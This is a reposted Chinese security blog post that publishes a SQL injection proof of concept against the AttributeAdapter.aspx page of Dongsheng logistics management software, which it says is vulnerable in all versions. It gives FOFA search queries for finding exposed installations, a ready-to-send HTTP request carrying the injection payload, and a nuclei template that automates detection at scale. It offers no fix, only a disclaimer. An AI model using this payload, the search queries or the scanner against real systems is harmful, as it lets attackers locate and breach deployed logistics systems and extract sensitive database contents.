东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞 POC

admin 2024年11月12日20:15:10评论35 views字数 1300阅读4分20秒阅读模式

 

东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞 POC

漏洞简介
东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统 AttributeAdapter.aspx 存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库敏感信息。
影响版本
所有版本
资产测绘
fofa-query: body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"

东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞 POC

漏洞poc:
GET /FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20-- HTTP/1.1Host: 10.211.55.3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate, br
复现成功:

东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞 POC

nuclei脚本:
id: Dongsheng-Logistics-Software-AttributeAdapter-SQLiinfo:  name: 东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞  author: Simple  severity: medium  description: |    东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统 AttributeAdapter.aspx 存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库敏感信息。  reference:    - https://github.com/JJThome  metadata:    fofa-query: body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"http:  - method: GET    path:      - "{{BaseURL}}/FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20--"    matchers:      - type: dsl        dsl:          - contains(body,"nvarchar")          - contains(body,"Microsoft SQL Server")          - status_code == 500        condition: and
END

原文始发于微信公众号(simple学安全):东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞POC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月12日20:15:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞 POChttps://cn-sec.com/archives/3388294.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息